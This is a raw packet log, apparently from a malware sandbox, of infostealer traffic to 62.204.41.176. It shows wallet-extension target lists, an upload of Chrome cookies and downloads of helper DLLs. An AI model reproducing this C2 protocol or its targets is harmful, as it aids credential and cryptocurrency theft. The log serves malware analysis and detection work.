                                                                                                                                  Oct 10, 2024 09:28:56.316909075 CEST467OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----IJKJJKFHIJKKFHJJECBA
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 267
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 2d 2d 0d 0a
                                                                                                                                  Data Ascii: ------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="message"plugins------IJKJJKFHIJKKFHJJECBA--
                                                                                                                                  Oct 10, 2024 09:28:56.552234888 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:28:56 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 7116
                                                                                                                                  Keep-Alive: timeout=5, max=97
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                  Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                  Oct 10, 2024 09:28:56.552261114 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                  Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                  Oct 10, 2024 09:28:56.552275896 CEST1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                  Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                  Oct 10, 2024 09:28:56.552292109 CEST1236INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                                                                                  Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                                                                                  Oct 10, 2024 09:28:56.552308083 CEST1236INData Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58
                                                                                                                                  Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
                                                                                                                                  Oct 10, 2024 09:28:56.552323103 CEST1164INData Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57
                                                                                                                                  Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
                                                                                                                                  Oct 10, 2024 09:28:56.554615974 CEST468OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 268
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a
                                                                                                                                  Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="message"fplugins------AAEGHJKJKKJDHIDHJKJD--
                                                                                                                                  Oct 10, 2024 09:28:56.781467915 CEST335INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:28:56 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 108
                                                                                                                                  Keep-Alive: timeout=5, max=96
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                  Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                  Oct 10, 2024 09:28:56.806358099 CEST201OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 5147
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:28:56.806412935 CEST5147OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31
                                                                                                                                  Data Ascii: ------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                  Oct 10, 2024 09:28:57.189971924 CEST202INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:28:56 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Content-Length: 0
                                                                                                                                  Keep-Alive: timeout=5, max=95
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Oct 10, 2024 09:28:57.463040113 CEST92OUTGET /db293a2c1b1c70c4/sqlite3.dll HTTP/1.1
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:28:57.681269884 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:28:57 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                                                                                  ETag: "10e436-5e7eeebed8d80"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 1106998
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                  Oct 10, 2024 09:28:57.681296110 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                  Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                  Oct 10, 2024 09:28:57.681313038 CEST1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                                                                  Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                                                                                  Oct 10, 2024 09:28:57.681328058 CEST672INData Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31
                                                                                                                                  Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?
                                                                                                                                  Oct 10, 2024 09:28:58.763999939 CEST951OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIE
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 751
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                  Data Ascii: ------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------AFIEGCAECGCAEBFHDHIE--
                                                                                                                                  Oct 10, 2024 09:28:59.042172909 CEST202INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:28:58 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Content-Length: 0
                                                                                                                                  Keep-Alive: timeout=5, max=93
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Oct 10, 2024 09:28:59.218924046 CEST559OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJE
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 359
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 33 4a 6c 61 47 70 6c 63 6d 64 79 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 [TRUNCATED]
                                                                                                                                  Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="file_name"Z3JlaGplcmdyLnB3ZA==------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="file"------JJDGCGHCGHCBFHJJKKJE--
                                                                                                                                  Oct 10, 2024 09:28:59.497117996 CEST202INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:28:59 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Content-Length: 0
                                                                                                                                  Keep-Alive: timeout=5, max=92
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Oct 10, 2024 09:29:00.257641077 CEST559OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----EGIJKEHCAKFCAKFHDAAA
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Content-Length: 359
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 33 4a 6c 61 47 70 6c 63 6d 64 79 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 [TRUNCATED]
                                                                                                                                  Data Ascii: ------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="file_name"Z3JlaGplcmdyLnB3ZA==------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="file"------EGIJKEHCAKFCAKFHDAAA--
                                                                                                                                  Oct 10, 2024 09:29:00.596148014 CEST202INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:00 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Content-Length: 0
                                                                                                                                  Keep-Alive: timeout=5, max=91
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Oct 10, 2024 09:29:01.044856071 CEST92OUTGET /db293a2c1b1c70c4/freebl3.dll HTTP/1.1
                                                                                                                                  Host: 62.204.41.176
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Oct 10, 2024 09:29:01.396373034 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Date: Thu, 10 Oct 2024 07:29:01 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                  ETag: "a7550-5e7ebd4425100"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 685392
                                                                                                                                  Content-Type: application/x-msdos-program
